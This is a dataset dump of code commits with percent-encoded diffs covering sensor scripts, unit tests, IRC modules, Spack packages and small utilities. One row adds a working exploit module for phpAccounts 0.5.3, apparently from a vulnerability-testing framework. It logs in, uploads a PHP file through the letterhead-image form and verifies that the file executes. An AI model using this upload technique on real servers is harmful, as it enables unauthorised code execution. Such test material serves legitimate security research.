commit
stringlengths 40
40
| subject
stringlengths 1
3.25k
| old_file
stringlengths 4
311
| new_file
stringlengths 4
311
| old_contents
stringlengths 0
26.3k
| lang
stringclasses 3
values | proba
float64 0
1
| diff
stringlengths 0
7.82k
|
---|---|---|---|---|---|---|---|
bbc208548f0dd381f3045d24db3c21c4c8ee004e
|
Test all sensors at once
|
grovepi/scan.py
|
grovepi/scan.py
|
Python
| 0 |
@@ -0,0 +1,1456 @@
+import time%0Aimport grove_i2c_temp_hum_mini # temp + humidity%0Aimport hp206c # altitude + temp + pressure%0Aimport grovepi # used by air sensor and dust sensor%0Aimport atexit # used for the dust sensor%0Aimport json%0A%0A# Initialize the sensors%0At= grove_i2c_temp_hum_mini.th02()%0Ah= hp206c.hp206c()%0Agrovepi.dust_sensor_en()%0Aair_sensor = 0%0Agrovepi.pinMode(air_sensor,%22INPUT%22)%0Aatexit.register(grovepi.dust_sensor_dis)%0A%0Aret=h.isAvailable()%0Aif h.OK_HP20X_DEV == ret:%0A%09print %22HP20x_dev is available.%22 %0Aelse:%0A%09print %22HP20x_dev isn't available.%22%0A%0A%0Awhile True:%0A%09temp = h.ReadTemperature()%0A%09temp2 = t.getTemperature()%0A%09pressure = h.ReadPressure()%0A%09altitude = h.ReadAltitude()%0A%09humidity = t.getHumidity()%0A%09air_quality = %22--%22%0A%0A # try:%0A # %09# Get dust%0A%09%09# %5Bnew_val,lowpulseoccupancy%5D = grovepi.dustSensorRead()%0A%09%09# if new_val:%0A%09%09# %09print lowpulseoccupancy%0A # except IOError:%0A #%09 print (%22Error%22)%0A%0A%09try:%0A%09%09# Get air quality%0A%09%09air_quality = grovepi.analogRead(air_sensor)%0A%0A%09%09if air_quality %3E 700:%0A%09%09%09print (%22High pollution%22)%0A%09%09elif air_quality %3E 300:%0A%09%09%09print (%22Low pollution%22)%0A%09%09else:%0A%09%09%09print (%22Air fresh%22)%0A%0A%09%09print (%22air_quality =%22, air_quality)%0A%09except IOError:%0A%09%09print (%22Error%22)%0A%0A%09# Send result%0A%09data = %7B%0A%09%09%22air_quality%22: air_quality,%0A%09%09%22humidity%22: humidity,%0A%09%09%22temperature%22: (temp + temp2) / 2,%0A%09%09%22pressure%22: pressure,%0A%09%09%22altitude%22: altitude%0A%09%7D%0A%0A%09print json.dumps(data)%0A # with open('./json/hsk1.json', 'wb') as f:%0A%09%09# f.write(json.dumps(voc))%0A%09time.sleep(.5)
|
|
c834082c59abe6ae6d2e065e1a5afac2d399a612
|
Add unittests for the bridgedb.crypto module.
|
lib/bridgedb/test/test_crypto.py
|
lib/bridgedb/test/test_crypto.py
|
Python
| 0 |
@@ -0,0 +1,2114 @@
+# -*- coding: utf-8 -*-%0A#%0A# This file is part of BridgeDB, a Tor bridge distribution system.%0A#%0A# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 %[email protected]%3E%0A# please also see AUTHORS file%0A# :copyright: (c) 2013, Isis Lovecruft%0A# (c) 2007-2013, The Tor Project, Inc.%0A# (c) 2007-2013, all entities within the AUTHORS file%0A# :license: 3-Clause BSD, see LICENSE for licensing information%0A%0A%22%22%22Unittests for :mod:%60bridgedb.crypto%60.%22%22%22%0A%0Afrom __future__ import print_function%0Afrom __future__ import unicode_literals%0A%0Aimport os%0A%0Afrom twisted.trial import unittest%0Afrom bridgedb import crypto%0A%0A%0ASEKRIT_KEY = b'v%5Cx16Xm%5Cxfc%5Cx1b%7D%5Cx063%5Cx85%5Cxaa%5Cxa5%5Cxf9%5Cxad%5Cx18%5Cxb2P%5Cx93%5Cxc6k%5Cxf9'%0ASEKRIT_KEY += b'%5Cx8bI%5Cxd9%5Cxb8xw%5Cxf5%5Cxec%5Cx1b%5Cx7f%5Cxa8'%0A%0A%0Aclass CryptoTest(unittest.TestCase):%0A%0A def test_getKey_nokey(self):%0A %22%22%22Test retrieving the secret_key from an empty file.%22%22%22%0A filename = os.path.join(os.getcwd(), 'sekrit')%0A key = crypto.getKey(filename)%0A self.failUnlessIsInstance(key, basestring,%0A %22key isn't a string! type=%25r%22 %25 type(key))%0A%0A def test_getKey_tmpfile(self):%0A %22%22%22Test retrieving the secret_key from a new tmpfile.%22%22%22%0A filename = self.mktemp()%0A key = crypto.getKey(filename)%0A self.failUnlessIsInstance(key, basestring,%0A %22key isn't a string! type=%25r%22 %25 type(key))%0A%0A def test_getKey_keyexists(self):%0A %22%22%22Write the example key to a file and test reading it back.%22%22%22%0A filename = self.mktemp()%0A with open(filename, 'wb') as fh:%0A fh.write(SEKRIT_KEY)%0A fh.flush()%0A%0A key = crypto.getKey(filename)%0A self.failUnlessIsInstance(key, basestring,%0A %22key isn't a string! 
type=%25r%22 %25 type(key))%0A self.assertEqual(SEKRIT_KEY, key,%0A %22%22%22The example key and the one read from file differ!%0A key (in hex): %25s%0A SEKRIT_KEY (in hex): %25s%22%22%22%0A %25 (key.encode('hex'), SEKRIT_KEY.encode('hex')))%0A
|
|
8373de2daf5c44c069b9312ad3a3b21e2f5c21e3
|
Implement channel mode +l
|
txircd/modules/cmode_l.py
|
txircd/modules/cmode_l.py
|
Python
| 0 |
@@ -0,0 +1,1039 @@
+from twisted.words.protocols import irc%0Afrom txircd.modbase import Mode%0A%0Aclass LimitMode(Mode):%0A%09def checkSet(self, user, target, param):%0A%09%09intParam = int(param)%0A%09%09if str(intParam) != param:%0A%09%09%09return False%0A%09%09return (intParam %3E= 0)%0A%09%0A%09def commandPermission(self, user, cmd, data):%0A%09%09if cmd != %22JOIN%22:%0A%09%09%09return data%0A%09%09targetChannels = data%5B%22targetchan%22%5D%0A%09%09keys = data%5B%22keys%22%5D%0A%09%09removeChannels = %5B%5D%0A%09%09for channel in targetChannels:%0A%09%09%09if %22l%22 in channel.mode and len(channel.users) %3E= int(channel.mode%5B%22l%22%5D):%0A%09%09%09%09user.sendMessage(irc.ERR_CHANNELISFULL, channel.name, %22:Cannot join channel (Channel is full)%22)%0A%09%09%09%09removeChannels.append(channel)%0A%09%09%0A%09%09for channel in removeChannels:%0A%09%09%09index = targetChannels.index(channel)%0A%09%09%09targetChannels.pop(index)%0A%09%09%09keys.pop(index)%0A%09%09data%5B%22targetchan%22%5D = targetChannels%0A%09%09data%5B%22keys%22%5D = keys%0A%09%09return data%0A%0Aclass Spawner(object):%0A%09def __init__(self, ircd):%0A%09%09self.ircd = ircd%0A%09%0A%09def spawn(self):%0A%09%09return %7B%0A%09%09%09%22modes%22: %7B%0A%09%09%09%09%22cpl%22: LimitMode()%0A%09%09%09%7D%0A%09%09%7D%0A%09%0A%09def cleanup(self):%0A%09%09self.ircd.removeMode(%22cpl%22)
|
|
a24844a20634354167511163870438c36581c656
|
Add py-hpack (#19189)
|
var/spack/repos/builtin/packages/py-hpack/package.py
|
var/spack/repos/builtin/packages/py-hpack/package.py
|
Python
| 0 |
@@ -0,0 +1,614 @@
+# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other%0A# Spack Project Developers. See the top-level COPYRIGHT file for details.%0A#%0A# SPDX-License-Identifier: (Apache-2.0 OR MIT)%0A%0Afrom spack import *%0A%0A%0Aclass PyHpack(PythonPackage):%0A %22%22%22Pure-Python HPACK header compression%22%22%22%0A%0A homepage = %22https://github.com/python-hyper/hpack%22%0A url = %22https://pypi.io/packages/source/h/hpack/hpack-4.0.0.tar.gz%22%0A%0A version('4.0.0', sha256='fc41de0c63e687ebffde81187a948221294896f6bdc0ae2312708df339430095')%0A%0A depends_on('py-setuptools', type='build')%0A depends_on('py-wheel', type='build')%0A
|
|
5ed57df8d1e3b85bc27d5a834c9ec35b18055ba9
|
Create codility.py
|
codility.py
|
codility.py
|
Python
| 0.000003 |
@@ -0,0 +1,494 @@
+#lesson 1%0Adef solution(N):%0A bstr = dectoBin(N)%0A arr = %5B%5D%0A cnt = 0%0A for b in bstr:%0A if b == '0':%0A cnt = cnt + 1%0A if b != '0':%0A arr.append(cnt)%0A cnt = 0 %0A return getMax(arr)%0A%0Adef dectoBin(N):%0A bstr = %22%22%0A while N %3E 0:%0A bstr = str(N %25 2) + bstr%0A N = N // 2%0A return bstr%0A%0Adef getMax(arr):%0A max = arr%5B0%5D%0A for i in range(len(arr)):%0A if arr%5Bi%5D %3E max:%0A max = arr%5Bi%5D%0A return max%0A%0Asolution(0)%0A
|
|
955bca3beb7808636a586bed43c37e5f74fba17f
|
Add Weather class (use forecastio, geopy) - forecase(current/daily)
|
kino/functions/weather.py
|
kino/functions/weather.py
|
Python
| 0 |
@@ -0,0 +1,1562 @@
+# -*- coding: utf-8 -*-%0A%0Aimport datetime%0Aimport forecastio%0Afrom geopy.geocoders import GoogleV3%0A%0Afrom kino.template import MsgTemplate%0Afrom slack.slackbot import SlackerAdapter%0Afrom utils.config import Config%0A%0Aclass Weather(object):%0A%0A def __init__(self):%0A self.config = Config()%0A self.slackbot = SlackerAdapter()%0A self.template = MsgTemplate()%0A%0A geolocator = GoogleV3()%0A self.location = geolocator.geocode(self.config.weather%5B%22HOME%22%5D)%0A%0A api_key = self.config.weather%5B%22DARK_SKY_SECRET_KEY%22%5D%0A lat = self.location.latitude%0A lon = self.location.longitude%0A self.forecastio = forecastio.load_forecast(api_key, lat, lon)%0A%0A def read(self, when='current'):%0A if when == 'current':%0A self.__current_forecast()%0A elif when == 'daily':%0A self.__daily_forecast()%0A%0A def __daily_forecast(self):%0A daily = self.forecastio.daily()%0A%0A address = self.location.address%0A icon = daily.icon%0A summary = daily.summary%0A%0A attachments = self.template.make_weather_template(address, icon, summary)%0A self.slackbot.send_message(attachments=attachments)%0A%0A def __current_forecast(self):%0A current = self.forecastio.currently()%0A%0A address = self.location.address%0A icon = current.icon%0A summary = current.summary%0A temperature = current.temperature%0A%0A attachments = self.template.make_weather_template(address, icon, summary, temperature=temperature)%0A self.slackbot.send_message(attachments=attachments)%0A%0A%0A
|
|
1005f983774392306ca10e5fb12b59eeb63a88c4
|
add remote file inclusion exploit
|
framework/Exploits/OSVDB_82707_D.py
|
framework/Exploits/OSVDB_82707_D.py
|
Python
| 0.000001 |
@@ -0,0 +1,2463 @@
+%0A# Copyright 2013 University of Maryland. All rights reserved.%0A# Use of this source code is governed by a BSD-style%0A# license that can be found in the LICENSE.TXT file.%0A%0A%0Aimport framework %0Aimport time%0Aimport selenium.common.exceptions%0A%0Aclass Exploit (framework.Exploit):%0A attributes = %7B'Name' : %22OSVDB_82707D%22,%0A 'Description' : %22Upload and exec of php file using Letterhead img uplaod feature%22,%0A 'References' : %5B%5B'OSVDB','82707'%5D,%5B'http://www.osvdb.org/show/osvdb/82707'%5D%5D,%0A 'Target' : %22phpAccounts 0.5.3%22,%0A 'TargetLicense' : '',%0A 'Type' : %22EXEC%22,%0A 'VulWikiPage' : %22%22,%0A 'Privileged' : True%0A %7D%0A%0A def __init__(self, visible=False):%0A framework.Exploit.__init__(self, visible)%0A return%0A%0A%0A def setup(self, target_system_dir):%0A %0A self.logger.info(%22Creating payload file%22)%0A fd = file(%22/tmp/phpinfoexploit.php%22, 'w')%0A fd.write(%22%3C?php%5Cnphpinfo();%5Cn?%3E%22)%0A fd.close()%0A %0A return%0A%0A%0A def exploit(self):%0A driver = self.create_selenium_driver()%0A driver.get(%22http://127.0.0.1/phpaccounts/index.php%22)%0A%0A driver.get_element(by_xpath=%22//input%5B@name='Login_Username'%5D%22).send_keys(%[email protected]%22)%0A driver.get_element(by_xpath=%22//input%5B@name='Login_Password'%5D%22).send_keys(%22phpaccountspw21%22)%0A driver.get_element(by_xpath=%22//input%5B@value='Login'%5D%22).click()%0A driver.get_element(by_xpath=%22//frame%5B@name='leftFrame'%5D%22)%0A%0A driver.get(%22http://127.0.0.1//phpaccounts/index.php?page=tasks&action=preferences%22)%0A %0A driver.get_element(by_xpath=%22//input%5B@name='letterhead_image'%5D%22).send_keys(%22/tmp/phpinfoexploit.php%22)%0A%0A driver.get_element(by_xpath=%22//input%5B@value='Save Changes'%5D%22).click()%0A%0A %0A driver.cleanup()%0A return %0A%0A def verify(self):%0A driver = self.create_selenium_driver()%0A driver.get(%22http://127.0.0.1/phpaccounts/users/1/phpinfoexploit.php%22)%0A %0A try:%0A 
driver.get_element(by_xpath=%22//a%5B@href='http://www.php.net/'%5D%22)%0A driver.cleanup()%0A self.logger.info(%22Payload executed%22)%0A return True%0A except selenium.common.exceptions.NoSuchElementException:%0A self.logger.error(%22Payload failed to execute%22)%0A driver.cleanup()%0A %0A return False%0A%0A%0A
|
|
2c1b393c347ffcf24d9584be800378a1b77fa86d
|
add example to test error handling
|
flexx/ui/examples/errors.py
|
flexx/ui/examples/errors.py
|
Python
| 0 |
@@ -0,0 +1,1713 @@
+%22%22%22%0AApp that can be used to generate errors on the Python and JS side. These%0Aerrors should show tracebacks in the correct manner (and not crash the app%0Aas in #164).%0A%0ATo test thoroughly, you should probably also set the foo and bar%0Aproperties from the Python and JS console.%0A%22%22%22%0A%0Afrom flexx import app, event, ui%0A%0A%0Aclass Errors(ui.Widget):%0A %0A def init(self):%0A %0A with ui.VBox():%0A self.b1 = ui.Button(text='Raise error in JS property setter')%0A self.b2 = ui.Button(text='Raise error in JS event handler')%0A self.b3 = ui.Button(text='Raise error in Python property setter')%0A self.b4 = ui.Button(text='Raise error in Python event handler')%0A ui.Widget(flex=1) # spacer%0A %0A class Both:%0A %0A @event.prop%0A def foo(self, v=1):%0A return self.reciprocal(v)%0A %0A def reciprocal(self, v):%0A return 1 / v%0A %0A def raise_error(self):%0A raise RuntimeError('Deliberate error')%0A %0A class JS:%0A %0A @event.prop%0A def bar(self, v):%0A self.raise_error()%0A %0A # Handlers for four buttons%0A %0A @event.connect('b1.mouse_click')%0A def error_in_JS_prop(self, *events):%0A self.bar = 2%0A %0A @event.connect('b2.mouse_click')%0A def error_in_JS_handler(self, *events):%0A self.raise_error()%0A %0A @event.connect('b3.mouse_click')%0A def error_in_Py_prop(self, *events):%0A self.foo = 0%0A %0A @event.connect('b4.mouse_click')%0A def error_in_Py_handler(self, *events):%0A self.raise_error()%0A%0A%0Aif __name__ == '__main__':%0A m = app.launch(Errors)%0A app.run()%0A
|
|
331308eedd37628f5419001fc48fc5a328c1bab9
|
Add test_jsc
|
unnaturalcode/test_jsc.py
|
unnaturalcode/test_jsc.py
|
Python
| 0.00001 |
@@ -0,0 +1,1604 @@
+#!/usr/bin/python%0A# Copyright 2017 Dhvani Patel%0A#%0A# This file is part of UnnaturalCode.%0A# %0A# UnnaturalCode is free software: you can redistribute it and/or modify%0A# it under the terms of the GNU Affero General Public License as published by%0A# the Free Software Foundation, either version 3 of the License, or%0A# (at your option) any later version.%0A#%0A# UnnaturalCode is distributed in the hope that it will be useful,%0A# but WITHOUT ANY WARRANTY; without even the implied warranty of%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the%0A# GNU Affero General Public License for more details.%0A#%0A# You should have received a copy of the GNU Affero General Public License%0A# along with UnnaturalCode. If not, see %3Chttp://www.gnu.org/licenses/%3E.%0A%0Afrom check_jsc_syntax import checkJSCSyntax%0Afrom compile_error import CompileError%0A%0Aimport unittest%0A%0AERROR_TEST = %22%22%22if (process.argv.length %3C 3)%0A%09console.error(%22not enough args%22);%0A%09process.exit(1);%0A%7D%0A%22%22%22%0A%0Aclass TestStringMethods(unittest.TestCase):%0A%0A%09def test_syntax_ok(self):%0A%09%09toTest = checkJSCSyntax('a=1+2')%0A%09%09self.assertTrue(toTest is None)%0A%09%09%0A%09def test_syntax_error(self):%0A%09%09toTest = checkJSCSyntax(ERROR_TEST)%0A%09%09self.assertTrue(isinstance (toTest%5B0%5D, CompileError))%0A%09%09self.assertEqual(toTest%5B0%5D.filename, 'toCheck.js')%0A%09%09self.assertEqual(toTest%5B0%5D.line, 4)%0A%09%09self.assertEqual(toTest%5B0%5D.column, None)%0A%09%09self.assertEqual(toTest%5B0%5D.functionname, None)%0A%09%09self.assertEqual(toTest%5B0%5D.text, 'Parser error')%0A%09%09self.assertEqual(toTest%5B0%5D.errorname, 'SyntaxError')%0A%09%0A%09%09%0Aif __name__ == '__main__':%0A unittest.main()%0A
|
|
a6495a05d4652beeefca9e383f5dd7b8fc4246d7
|
Create simple_fun_91:unique_digit_products.py
|
Solutions/simple_fun_91:unique_digit_products.py
|
Solutions/simple_fun_91:unique_digit_products.py
|
Python
| 0.999972 |
@@ -0,0 +1,115 @@
+from operator import mul%0A%0Adef unique_digit_products(a):%0A return len(%7Breduce(mul, map(int, str(x))) for x in a%7D)%0A
|
|
371545ecae0296f9274319c971be1378c3dafbbe
|
Add migration
|
services/migrations/0036_auto_20150327_1434.py
|
services/migrations/0036_auto_20150327_1434.py
|
Python
| 0.000002 |
@@ -0,0 +1,1298 @@
+# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom django.db import models, migrations%0A%0A%0Aclass Migration(migrations.Migration):%0A%0A dependencies = %5B%0A ('services', '0035_auto_20150325_1637'),%0A %5D%0A%0A operations = %5B%0A migrations.AddField(%0A model_name='jiraupdaterecord',%0A name='feedback',%0A field=models.ForeignKey(to='services.Feedback', null=True, related_name='jira_records', blank=True),%0A preserve_default=True,%0A ),%0A migrations.AlterField(%0A model_name='jiraupdaterecord',%0A name='update_type',%0A field=models.CharField(max_length=22, choices=%5B('provider-change', 'Provider updated their information'), ('new-service', 'New service submitted by provider'), ('change-service', 'Change to existing service submitted by provider'), ('cancel-draft-service', 'Provider canceled a draft service'), ('cancel-current-service', 'Provider canceled a current service'), ('superseded-draft', 'Provider superseded a previous draft'), ('approve-service', 'Staff approved a new or changed service'), ('rejected-service', 'Staff rejected a new or changed service'), ('feedback', 'User submitted feedback')%5D, verbose_name='update type'),%0A preserve_default=True,%0A ),%0A %5D%0A
|
|
7d061e698788a60f0e3b59559961408015d891ed
|
Add first iteration of message_producer
|
utils/message_producer.py
|
utils/message_producer.py
|
Python
| 0.000051 |
@@ -0,0 +1,1109 @@
+import argparse%0Aimport pika%0A%0A%0Adef send_message(queue, body=None):%0A %22%22%22%0A Sends a message to the specified queue with specified body if applicable.%0A%0A :param queue: Name of queue.%0A :type queue: str%0A :param body: Content of message body in the form %22%7B'key': 'value'%7D%22.%0A :type body: str%0A %22%22%22%0A connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))%0A channel = connection.channel()%0A%0A channel.queue_declare(queue=queue)%0A%0A channel.basic_publish(exchange='', routing_key=queue, body=body)%0A print(%22 %5Bx%5D Message sent.%22)%0A print(%22 Queue: %7B0%7D%22.format(queue))%0A print(%22 Body: %7B0%7D%22.format(body))%0A%0A connection.close()%0A%0A%0Aif __name__ == '__main__':%0A parser = argparse.ArgumentParser(description='Send a message to the '%0A 'specified queue.')%0A parser.add_argument('-q', '--queue', required=True,%0A help='The destination of the message')%0A parser.add_argument('-b', '--body', help='The message body, if applicable.')%0A args = parser.parse_args()%0A%0A send_message(args.queue, args.body)
|
|
49614576524e74cb2e8eaa6656c1e86bf546c8e6
|
Create keystone_test.py
|
keystone_test.py
|
keystone_test.py
|
Python
| 0.000005 |
@@ -0,0 +1,1624 @@
+import keystoneclient.v2_0.client as ksclient%0Aimport novaclient.v1_1.client as nvclient%0Afrom novaclient import client as novaclient%0Aimport glanceclient%0Aimport os%0A%0Adef get_keystone_creds():%0A d = %7B%7D%0A d%5B'username'%5D = 'admin'%0A d%5B'password'%5D = 'password'%0A d%5B'auth_url'%5D = 'http://10.0.2.15:5000/v2.0/'%0A d%5B'tenant_name'%5D = 'demo'%0A return d%0A%0Adef get_nova_creds():%0A d = %7B%7D%0A d%5B'username'%5D = 'admin'%0A d%5B'api_key'%5D = 'password'%0A d%5B'auth_url'%5D = 'http://10.0.2.15:5000/v2.0/'%0A d%5B'project_id'%5D = 'demo'%0A return d%0A%0Aif __name__== %22__main__%22:%0A keystone_creds = get_keystone_creds()%0A keystone = ksclient.Client(**keystone_creds)%0A %0A nova_creds = get_nova_creds()%0A nova = nvclient.Client(**nova_creds)%0A %0A #if not nova.keypairs.findall(name=%22mykey%22):%0A # with open(os.path.expanduser('~/.ssh/id_rsa.pub')) as fpubkey:%0A # nova.keypairs.create(name=%22mykey%22, public_key=fpubkey.read())%0A %0A glance_endpoint = keystone.service_catalog.url_for(service_type='image',%0A endpoint_type='publicURL')%0A glance = glanceclient.Client('1',glance_endpoint, token=keystone.auth_token)%0A images = glance.images.list()%0A for one_image in images:%0A if one_image.name.find('ubuntu') %3E -1:%0A print one_image.name%0A image = nova.images.find(name=one_image.name)%0A flavor = nova.flavors.find(name=%22m1.small%22)%0A instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor)%0A#instance = nova.servers.create(name=one_image.name, image=image, flavor=flavor, key_name=%22mykey%22)%0A
|
|
6789f2ea1862f4c30e8d60bd0b47640b7e5835c1
|
Add script to count labels in a data set
|
count_labels.py
|
count_labels.py
|
Python
| 0 |
@@ -0,0 +1,1059 @@
+%22%22%22Count HEEM labels in data set.%0A%0AUsage: python count_labels.py %3Cdir with train and test files%3E%0A%22%22%22%0Aimport codecs%0Afrom glob import glob%0Aimport numpy as np%0Aimport argparse%0Afrom collections import Counter%0A%0A%0Adef load_data(data_file):%0A data = %5Bln.rsplit(None, 1) for ln in open(data_file)%5D%0A%0A X_data, Y_data = zip(*data)%0A%0A return X_data, Y_data%0A%0A%0Adef count_labels(file_name, counter):%0A # load data set%0A X_data, Y_data = load_data(file_name)%0A%0A Y = %5Bs.split('_') for s in Y_data%5D%0A%0A for labelset in Y:%0A counter.update(labelset)%0A%0A del counter%5B'None'%5D%0A%0A return counter%0A%0A%0Aparser = argparse.ArgumentParser()%0Aparser.add_argument('input_dir', help='the directory where the input text '%0A 'files can be found.')%0Aargs = parser.parse_args()%0A%0Atrain_file = '%7B%7D/train_1.txt'.format(args.input_dir)%0Atest_file = '%7B%7D/test_1.txt'.format(args.input_dir)%0A%0Alabels = Counter()%0Alabels = count_labels(train_file, labels)%0Alabels = count_labels(test_file, labels)%0A%0Afor l, freq in labels.most_common():%0A print '%7B%7D%5Ct%7B%7D'.format(l, freq)%0A%0A
|
|
2c4a2368d2dc1c6ee910358fedd6e85cdf4f043a
|
Add test from jasmine-core
|
test/jasmine_core_test.py
|
test/jasmine_core_test.py
|
Python
| 0 |
@@ -0,0 +1,630 @@
+from pytest import raises%0Aimport pytest%0Aimport subprocess%0A%0Afrom jasmine_core import Core%0Aimport os%0Aimport pkg_resources%0A%0Anotwin32 = pytest.mark.skipif(%22sys.platform == 'win32'%22)%0A%0A@notwin32%0Adef test_js_files():%0A files = %5B%0A 'jasmine.js',%0A 'jasmine-html.js',%0A 'json2.js',%0A 'boot.js'%0A %5D%0A%0A assert Core.js_files() == files%0A%0A%0Adef test_css_files():%0A %22%22%22 Should return a list of css files that are relative to Core.path() %22%22%22%0A assert %5B'jasmine.css'%5D == Core.css_files()%0A%0A%0Adef test_favicon():%0A assert os.path.isfile(pkg_resources.resource_filename('jasmine_core.images', 'jasmine_favicon.png'))
|
|
7b5b4fdf8d5801d6e87d1b39f46a5f868aa07110
|
Add test
|
tests/cupy_tests/test_typing.py
|
tests/cupy_tests/test_typing.py
|
Python
| 0.000005 |
@@ -0,0 +1,135 @@
+import cupy%0A%0A%0Aclass TestClassGetItem:%0A%0A def test_class_getitem(self):%0A from typing import Any%0A cupy.ndarray%5BAny, Any%5D%0A
|
|
a9609a500a65cc0efb787f5d90e164bd6fa48c1a
|
Print the left view of a BST
|
leftViewofBST.py
|
leftViewofBST.py
|
Python
| 0.999984 |
@@ -0,0 +1,1075 @@
+class BST:%0A def __init__(self,val):%0A self.left = None%0A self.right = None%0A self.data = val%0A%0Adef insertToBst(root,value):%0A if root is None:%0A root = value%0A else:%0A if value.data %3C root.data:%0A if root.left is None:%0A root.left = value%0A else:%0A insertToBst(root.left, value)%0A else:%0A if root.right is None:%0A root.right = value%0A else:%0A insertToBst(root.right, value)%0A%0Adef leftView(root,level,currentLevel):%0A if not root:%0A return%0A else:%0A if (currentLevel%5B0%5D %3C level):%0A print root.data%0A currentLevel%5B0%5D = level%0A leftView(root.left, level+1, currentLevel)%0A leftView(root.right, level+1, currentLevel) %0A %0Atree = BST(5)%0AinsertToBst(tree, BST(4))%0AinsertToBst(tree, BST(6))%0AinsertToBst(tree, BST(2))%0AinsertToBst(tree, BST(1))%0AinsertToBst(tree, BST(7))%0AinsertToBst(tree, BST(8))%0AinsertToBst(tree, BST(9))%0AinsertToBst(tree, BST(10))%0A%0AleftView(tree, 1, %5B0%5D) # =%3E 5,4,2,1,9,10 ,O(n)%0A%0A
|
|
08e7103766ce684e849f23fac77792876fded586
|
fix helper to use the actual lines form ceph.conf
|
tests/functional/tests/mon/test_initial_members.py
|
tests/functional/tests/mon/test_initial_members.py
|
import pytest
uses_mon_initial_members = pytest.mark.skipif(
'mon_initial_members' not in pytest.config.slaveinput['node_config']['components'],
reason="only run in monitors configured with initial_members"
)
class TestMon(object):
def get_line_from_config(self, string, conf_path):
with open(conf_path) as ceph_conf:
ceph_conf_lines = ceph_conf.readlines()
for line in ceph_conf:
if string in line:
return line
@uses_mon_initial_members
def test_ceph_config_has_inital_members_line(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line
@uses_mon_initial_members
def test_initial_members_line_has_correct_value(self, scenario_config):
cluster_name = scenario_config.get('ceph', {}).get('cluster_name', 'ceph')
ceph_conf_path = '/etc/ceph/%s.conf' % cluster_name
initial_members_line = self.get_line_from_config('mon_initial_members', ceph_conf_path)
assert initial_members_line == 'mon_initial_members = mon0'
|
Python
| 0 |
@@ -414,34 +414,40 @@
ine in ceph_conf
+_lines
:%0A
-
@@ -801,33 +801,33 @@
_config('mon
-_
+
initial
-_
+
members', ce
@@ -1183,33 +1183,33 @@
_config('mon
-_
+
initial
-_
+
members', ce
@@ -1261,33 +1261,33 @@
line == 'mon
-_
+
initial
-_
+
members = mo
|
5fad9d4fb60eb29d04d8d6a7fd967aad67ca28e2
|
Create __init__.py
|
pagination_bootstrap/__init__.py
|
pagination_bootstrap/__init__.py
|
Python
| 0.000429 |
@@ -0,0 +1 @@
+%0A
|
|
379d2953c90610a48eb80d1cabedb63b8f948813
|
Use `for_app` helper
|
thefuck/rules/fab_command_not_found.py
|
thefuck/rules/fab_command_not_found.py
|
from thefuck.utils import eager, get_closest
def match(command):
return (command.script_parts[0] == 'fab'
and 'Warning: Command(s) not found:' in command.stderr)
# We need different behavior then in get_all_matched_commands.
@eager
def _get_between(content, start, end=None):
should_yield = False
for line in content.split('\n'):
if start in line:
should_yield = True
continue
if end and end in line:
return
if should_yield and line:
yield line.strip().split(' ')[0]
def get_new_command(command):
not_found_commands = _get_between(
command.stderr, 'Warning: Command(s) not found:', 'Available commands:')
possible_commands = _get_between(
command.stdout, 'Available commands:')
script = command.script
for not_found in not_found_commands:
fix = get_closest(not_found, possible_commands)
script = script.replace(' {}'.format(not_found),
' {}'.format(fix))
return script
|
Python
| 0.000036 |
@@ -37,18 +37,43 @@
_closest
-%0A%0A
+, for_app%0A%0A%0A@for_app('fab')
%0Adef mat
@@ -100,58 +100,8 @@
urn
-(command.script_parts%5B0%5D == 'fab'%0A and
'War
@@ -146,17 +146,16 @@
d.stderr
-)
%0A%0A%0A# We
|
df777bf0771fdd8aadfbb26fe13b51692f4c161d
|
Add autogen package (#3542)
|
var/spack/repos/builtin/packages/autogen/package.py
|
var/spack/repos/builtin/packages/autogen/package.py
|
Python
| 0 |
@@ -0,0 +1,2398 @@
+##############################################################################%0A# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.%0A# Produced at the Lawrence Livermore National Laboratory.%0A#%0A# This file is part of Spack.%0A# Created by Todd Gamblin, [email protected], All rights reserved.%0A# LLNL-CODE-647188%0A#%0A# For details, see https://github.com/llnl/spack%0A# Please also see the LICENSE file for our notice and the LGPL.%0A#%0A# This program is free software; you can redistribute it and/or modify%0A# it under the terms of the GNU Lesser General Public License (as%0A# published by the Free Software Foundation) version 2.1, February 1999.%0A#%0A# This program is distributed in the hope that it will be useful, but%0A# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF%0A# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and%0A# conditions of the GNU Lesser General Public License for more details.%0A#%0A# You should have received a copy of the GNU Lesser General Public%0A# License along with this program; if not, write to the Free Software%0A# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA%0A##############################################################################%0Afrom spack import *%0A%0A%0Aclass Autogen(AutotoolsPackage):%0A %22%22%22AutoGen is a tool designed to simplify the creation and maintenance of%0A programs that contain large amounts of repetitious text. 
It is especially%0A valuable in programs that have several blocks of text that must be kept%0A synchronized.%22%22%22%0A%0A homepage = %22https://www.gnu.org/software/autogen/index.html%22%0A url = %22https://ftp.gnu.org/gnu/autogen/rel5.18.12/autogen-5.18.12.tar.gz%22%0A list_url = %22https://ftp.gnu.org/gnu/autogen%22%0A list_depth = 2%0A%0A version('5.18.12', '551d15ccbf5b5fc5658da375d5003389')%0A%0A variant('xml', default=True, description='Enable XML support')%0A%0A depends_on('[email protected]:', type='build')%0A%0A depends_on('[email protected]:2.0')%0A depends_on('libxml2', when='+xml')%0A%0A def configure_args(self):%0A spec = self.spec%0A%0A args = %5B%0A # %60make check%60 fails without this%0A # Adding a gettext dependency does not help%0A '--disable-nls',%0A %5D%0A%0A if '+xml' in spec:%0A args.append('--with-libxml2=%7B0%7D'.format(spec%5B'libxml2'%5D.prefix))%0A else:%0A args.append('--without-libxml2')%0A%0A return args%0A
|
|
cbbf9f34d08897358023078d81be3fa798601b02
|
add the repl.py
|
repl.py
|
repl.py
|
Python
